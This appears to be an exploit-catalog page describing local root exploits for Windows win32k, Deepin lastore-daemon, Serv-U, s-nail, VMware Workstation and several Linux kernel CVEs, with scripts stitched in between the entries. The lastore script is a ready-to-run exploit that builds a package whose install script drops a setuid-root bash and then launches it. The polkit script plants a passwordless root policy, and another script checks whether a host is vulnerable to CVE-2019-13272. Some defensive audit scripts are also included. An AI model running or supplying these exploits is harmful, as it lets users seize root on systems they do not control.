Explore Vulnerabilities
Explore all Exploits:

Windows Win32k Local Privilege Escalation Vulnerability

This exploit is a local privilege escalation for the Windows win32k.sys kernel driver that yields SYSTEM privileges by exploiting a race condition in win32k. It uses two standard building blocks of win32k exploitation: xxHMValidateHandle, a user32 routine reachable from user mode that returns a copy of a kernel window object and thereby leaks the object's kernel address, and NtAllocateVirtualMemory, which allocates a user-mode region at a chosen address where a crafted structure is placed. When the kernel dereferences the corrupted pointer into that structure, the function pointer it contains is called in kernel context, and the attacker's code then runs with SYSTEM privileges.

Deepin Linux 15.5 lastore-daemon D-Bus Local Root Exploit

The lastore-daemon D-Bus configuration on Deepin Linux 15.5 permits any user in the sudo group to install arbitrary packages through the daemon without providing a password. Because the daemon performs the installation as root, and a package's maintainer scripts run during installation, installing an attacker-built package results in code execution as root. By default, the first user created on the system is a member of the sudo group, so the default desktop user is affected.
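The package side of this primitive, as an added example that is not the lastore-daemon exploit from this page: a Debian package whose postinst drops a setuid-root copy of bash, which is what "install any package as root" turns into. The package name, the /tmp path, the use of dpkg-deb for the build step and the D-Bus method name com.deepin.lastore.Manager.InstallPackage are assumptions made for the demo, not taken from the page.

```sh
#!/bin/sh
# Added example, not the lastore-daemon exploit from the page: builds the kind
# of Debian package that turns "install any package as root" into a root shell.
# dpkg runs DEBIAN/postinst as root during installation, so the script inside
# it can drop a setuid-root copy of bash.
# Assumptions (not taken from the page): dpkg-deb is installed for the build
# step, and the D-Bus method is com.deepin.lastore.Manager.InstallPackage.

PKG_NAME="lastore-demo"
SUID_SHELL="/tmp/.lastore-demo-sh"

# Write the package tree under $1: DEBIAN/control plus the postinst payload.
make_payload_tree() {
    root="$1"
    mkdir -p "$root/DEBIAN"
    cat > "$root/DEBIAN/control" <<EOF
Package: $PKG_NAME
Version: 1.0
Section: misc
Priority: optional
Architecture: all
Maintainer: demo <demo@localhost>
Description: demonstration package (constructed for this example)
EOF
    # This script executes with uid 0 during installation; that is the escalation.
    cat > "$root/DEBIAN/postinst" <<EOF
#!/bin/sh
cp /bin/bash "$SUID_SHELL"
chown root:root "$SUID_SHELL"
chmod 4755 "$SUID_SHELL"
exit 0
EOF
    chmod 0755 "$root/DEBIAN/postinst"
}

# Sanity-check a tree before handing it to dpkg-deb: 0 when the control file
# names the package and postinst is executable and sets the setuid bit.
payload_tree_ok() {
    root="$1"
    grep -q "^Package: $PKG_NAME\$" "$root/DEBIAN/control" || return 1
    [ -x "$root/DEBIAN/postinst" ] || return 1
    grep -q "chmod 4755" "$root/DEBIAN/postinst" || return 1
    return 0
}

# Build the .deb, ask the root daemon to install it, then use the dropped shell.
build_and_install() {
    work=$(mktemp -d)
    make_payload_tree "$work/pkg"
    payload_tree_ok "$work/pkg" || { echo "bad package tree" >&2; return 1; }
    if ! command -v dpkg-deb >/dev/null 2>&1; then
        echo "dpkg-deb not found; tree left in $work/pkg" >&2
        return 1
    fi
    dpkg-deb --build "$work/pkg" "$work/$PKG_NAME.deb" || return 1
    # Install over the system bus; lastore-daemon performs the install as root.
    dbus-send --system --print-reply \
        --dest=com.deepin.lastore /com/deepin/lastore \
        com.deepin.lastore.Manager.InstallPackage \
        string:"" string:"$work/$PKG_NAME.deb" || return 1
    # The job is asynchronous; once it has run, the setuid copy exists.
    # -p keeps the effective uid 0 that the setuid bit grants.
    [ -u "$SUID_SHELL" ] && exec "$SUID_SHELL" -p
    echo "payload not yet installed; check $SUID_SHELL after the job finishes" >&2
    return 1
}

if [ "${1:-}" = "run" ]; then
    build_and_install
fi
```

Run it as `sh lastore-demo.sh run` on the target. The tree-building and sanity-check functions are the part that is independent of lastore-daemon: the same package works with any primitive that installs a user-supplied .deb as root.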

SUroot – Local root exploit for Serv-U FTP Server versions prior to 15.1.7 (CVE-2019-12181)

SUroot is a local root exploit for Serv-U FTP Server versions prior to 15.1.7 (CVE-2019-12181), a Bash variant of Guy Levin's Serv-U FTP Server exploit. The /usr/local/Serv-U/Serv-U binary is installed setuid root and builds a shell command from attacker-controlled input in its own argument vector, so invoking it with crafted arguments injects commands that run as root. The exploit uses the injection to copy /bin/bash to /tmp/sh, make the copy root-owned and setuid, and then launches /tmp/sh to obtain a root shell.

s-nail-privget.c local root exploit for CVE-2017-5899

This exploit is a wrapper for @wapiflapi's s-nail-privget.c local root exploit for CVE-2017-5899. s-nail-privsep is a setuid-root helper that s-nail uses to create lock files, so it runs with more privileges than s-nail itself; the exploit abuses it with the ld.so.preload technique. It compiles a shared library that spawns a root shell when loaded, then races s-nail-privsep so that the privileged helper writes the library's path into /etc/ld.so.preload. If the exploit wins the race, the library is preloaded into the next privileged process, which launches a root shell.
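The defender's view of the ld.so.preload technique, as an added example that is not code from the exploit or from s-nail: an audit of an ld.so.preload file. Every library listed there is mapped into every dynamically linked process, setuid ones included, so an entry a user can write to, or one that points outside the system library directories, is either a live escalation path or left-over persistence. The set of "system library directories" and the finding messages are choices made for this demo.

```sh
#!/bin/sh
# Added example (defensive side of the ld.so.preload technique; not code from
# the exploit or from s-nail): audit an ld.so.preload file.
# Every library listed there is mapped into every dynamically linked process,
# setuid ones included, so an entry a user can write to, or one outside the
# system library directories, is either a live escalation path or persistence.

# audit_preload [FILE]  (default /etc/ld.so.preload)
# Prints one finding per line; returns 0 when the file is absent or clean,
# 1 when anything suspicious was found.
audit_preload() {
    file="${1:-/etc/ld.so.preload}"
    [ -e "$file" ] || return 0
    findings=0
    # A world-writable preload file lets any local user add entries.
    if [ -n "$(find "$file" -perm -0002 2>/dev/null)" ]; then
        echo "$file: preload file is world-writable"
        findings=$((findings + 1))
    fi
    while IFS= read -r line || [ -n "$line" ]; do
        # ld.so accepts one path per line, whitespace around it is ignored.
        entry=$(printf '%s' "$line" | sed 's/^[[:space:]]*//; s/[[:space:]]*$//')
        case "$entry" in
            ''|'#'*) continue ;;
        esac
        # Directory list is an assumption for the demo; adjust to the distro.
        case "$entry" in
            /lib/*|/lib64/*|/usr/lib/*|/usr/lib64/*|/usr/local/lib/*) ;;
            *) echo "$file: $entry is outside the system library directories"
               findings=$((findings + 1)) ;;
        esac
        if [ ! -e "$entry" ]; then
            echo "$file: $entry does not exist (ld.so warns on every exec; typical residue of a removed implant)"
            findings=$((findings + 1))
            continue
        fi
        # Not root-owned or writable by others: anyone can swap in their own code.
        if [ -n "$(find "$entry" ! -user root -o -perm -0002 2>/dev/null)" ]; then
            echo "$file: $entry is not root-owned or is world-writable"
            findings=$((findings + 1))
        fi
    done < "$file"
    [ "$findings" -eq 0 ]
}

if [ "${1:-}" = "audit" ]; then
    audit_preload "${2:-/etc/ld.so.preload}"
fi
```

Run `sh preload-audit.sh audit` on a host to check the live file. A non-zero exit with a listed entry under /tmp or a home directory is exactly the state the race above leaves behind once it has been won.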

VMware Workstation Local Privilege Escalation exploit (CVE-2017-4915)

This exploit is for VMware Workstation Player and Pro versions 12.5.5 and below (CVE-2017-4915). It creates a directory, writes a C program to it, compiles it into a shared object, removes the C source, and writes an ALSA configuration file (.asoundrc) in the user's home directory that points at the shared object. It then executes the vmplayer binary; the setuid-root VMware process it starts honours the user's ALSA configuration, loads the shared object, and runs its code as root, granting the user root privileges.

Proof-of-Concept Local Root Exploit for CVE-2017-1000112

This proof-of-concept local root exploit for CVE-2017-1000112 (a memory corruption bug in the Linux kernel's UDP fragmentation offload code) includes KASLR and SMEP bypasses, but no SMAP bypass. It has been tested on Ubuntu trusty 4.4.0 kernels, Ubuntu xenial 4.4.0 and 4.8.0 kernels, Linux Mint rosa 4.4.0 kernels, Linux Mint sarah 4.8.0 kernels, and the Zorin OS 12.1 4.4.0-39 kernel.

Exploit for CVE-2018-18955

This exploit is a wrapper for Jann Horn's exploit for CVE-2018-18955, a user-namespace ID-mapping bug in the Linux kernel's map_write(), and uses its polkit technique to launch a root shell. It compiles three C files, subuid_shell.c, subshell.c and rootshell.c, uses them to gain write access outside the namespace through the broken mapping, and creates a policy file at /usr/share/polkit-1/actions/subuid.policy that allows any user to run the root shell binary through pkexec without authentication. It then launches pkexec, which executes the root shell.
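The polkit half of this technique from both sides, as an added example that is not code from Jann Horn's exploit: one function writes an action file of the kind the exploit plants (any caller may run the annotated program as root with no authentication), the other finds such files in an actions directory. The action id demo.rootshell, the file name and all paths are made up for the demo.

```sh
#!/bin/sh
# Added example, not code from Jann Horn's exploit: the polkit half of the
# technique above, from both sides. write_rootshell_policy writes an action
# file of the kind the exploit plants (any caller may run the annotated binary
# as root with no authentication) and audit_polkit_actions finds such files.
# The action id, file name and paths are made up for this demo.

# write_rootshell_policy DIR TARGET: write DIR/demo.rootshell.policy so that
# "pkexec TARGET" runs TARGET as root for anyone, in any session.
write_rootshell_policy() {
    dir="$1"; target="$2"
    cat > "$dir/demo.rootshell.policy" <<EOF
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE policyconfig PUBLIC "-//freedesktop//DTD PolicyKit Policy Configuration 1.0//EN"
 "http://www.freedesktop.org/standards/PolicyKit/1/policyconfig.dtd">
<policyconfig>
  <action id="demo.rootshell">
    <description>demo</description>
    <message>demo</message>
    <defaults>
      <allow_any>yes</allow_any>
      <allow_inactive>yes</allow_inactive>
      <allow_active>yes</allow_active>
    </defaults>
    <annotate key="org.freedesktop.policykit.exec.path">$target</annotate>
  </action>
</policyconfig>
EOF
}

# audit_polkit_actions [DIR]  (default /usr/share/polkit-1/actions)
# Prints "file: action -> program" for every action that lets any caller run a
# program as root without authenticating; returns 1 if any were found.
# The match is per file, which is enough for the single-action files this
# technique plants; a multi-action file may need a closer look by hand.
audit_polkit_actions() {
    dir="${1:-/usr/share/polkit-1/actions}"
    found=0
    for f in "$dir"/*.policy; do
        [ -f "$f" ] || continue
        grep -q '<allow_any>yes</allow_any>' "$f" || continue
        path=$(sed -n 's/.*key="org.freedesktop.policykit.exec.path">\([^<]*\)<.*/\1/p' "$f" | head -n 1)
        [ -n "$path" ] || continue
        id=$(sed -n 's/.*<action id="\([^"]*\)".*/\1/p' "$f" | head -n 1)
        note=""
        # A program that is not root-owned or is world-writable can be replaced by anyone.
        if [ -e "$path" ] && [ -n "$(find "$path" ! -user root -o -perm -0002 2>/dev/null)" ]; then
            note=" [program not root-owned or world-writable]"
        fi
        echo "$f: $id -> $path$note"
        found=$((found + 1))
    done
    [ "$found" -eq 0 ]
}

if [ "${1:-}" = "audit" ]; then
    audit_polkit_actions "${2:-/usr/share/polkit-1/actions}"
fi
```

`sh polkit-demo.sh audit` lists the actions on a host that behave like the planted subuid.policy. Legitimate actions with allow_any set to yes and an exec.path annotation exist on some desktops, so each hit needs a look at the program it names, which is what the ownership note is for.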

Linux 4.10 < 5.1.17 PTRACE_TRACEME local root (CVE-2019-13272)

This exploit targets a PTRACE_TRACEME credential-handling bug in Linux 4.10 < 5.1.17 (CVE-2019-13272) and uses a setuid-root pkexec as the target executable to gain root access. It was originally discovered and exploited by Jann Horn and later modified by bcoles@gmail.com to add known helper paths, search for suitable helpers, add automatic targeting, and change the target setuid executable from passwd to pkexec.
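The automatic-targeting step of such a wrapper, as an added example that is not the exploit itself: a pre-flight check that the running kernel falls in the affected range 4.10 up to (not including) 5.1.17 and that a setuid-root pkexec exists. The pkexec candidate paths and the decision to only report, not interpret, the Yama ptrace_scope value are assumptions made for the demo.

```sh
#!/bin/sh
# Added example, not the exploit itself: the pre-flight checks a wrapper like
# the one above performs before attempting CVE-2019-13272. Affected kernels are
# 4.10 up to (not including) 5.1.17; the target needs a setuid-root pkexec.
# The pkexec candidate paths are assumptions for the demo, not the exploit's.

# vercmp A B: compare dotted versions; prints -1, 0 or 1.
# Missing trailing components count as 0, so 4.10 equals 4.10.0.
vercmp() {
    a="$1"; b="$2"
    while [ -n "$a" ] || [ -n "$b" ]; do
        ai=${a%%.*}; bi=${b%%.*}
        [ -n "$ai" ] || ai=0
        [ -n "$bi" ] || bi=0
        if [ "$ai" -lt "$bi" ]; then echo -1; return; fi
        if [ "$ai" -gt "$bi" ]; then echo 1; return; fi
        case "$a" in *.*) a=${a#*.} ;; *) a="" ;; esac
        case "$b" in *.*) b=${b#*.} ;; *) b="" ;; esac
    done
    echo 0
}

# kernel_affected RELEASE: 0 if a uname -r string such as 4.15.0-54-generic
# falls in [4.10, 5.1.17). The distro suffix after the first non-digit is dropped.
kernel_affected() {
    v=$(printf '%s' "$1" | sed 's/[^0-9.].*//')
    [ "$(vercmp "$v" 4.10)" -ge 0 ] && [ "$(vercmp "$v" 5.1.17)" -lt 0 ]
}

# find_suid_pkexec: print the first root-owned setuid pkexec found, else return 1.
find_suid_pkexec() {
    for p in /usr/bin/pkexec /bin/pkexec /usr/local/bin/pkexec; do
        [ -f "$p" ] || continue
        [ -u "$p" ] || continue
        if [ -z "$(find "$p" ! -user root 2>/dev/null)" ]; then
            echo "$p"
            return 0
        fi
    done
    return 1
}

# preflight: report whether this host looks like a viable target.
preflight() {
    rel=$(uname -r)
    if kernel_affected "$rel"; then
        echo "kernel $rel: in affected range"
    else
        echo "kernel $rel: not in affected range"
        return 1
    fi
    if pk=$(find_suid_pkexec); then
        echo "setuid-root pkexec: $pk"
    else
        echo "no setuid-root pkexec found"
        return 1
    fi
    # Reported only; whether a given ptrace_scope blocks the technique is not decided here.
    if [ -r /proc/sys/kernel/yama/ptrace_scope ]; then
        echo "yama ptrace_scope: $(cat /proc/sys/kernel/yama/ptrace_scope)"
    fi
    return 0
}

if [ "${1:-}" = "check" ]; then
    preflight
fi
```

`sh ptrace-preflight.sh check` exits 0 only when both conditions hold. The version comparison is the part worth reusing: a bare string compare would rate 4.9 above 4.10 and 5.1.17 below 5.1.2.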
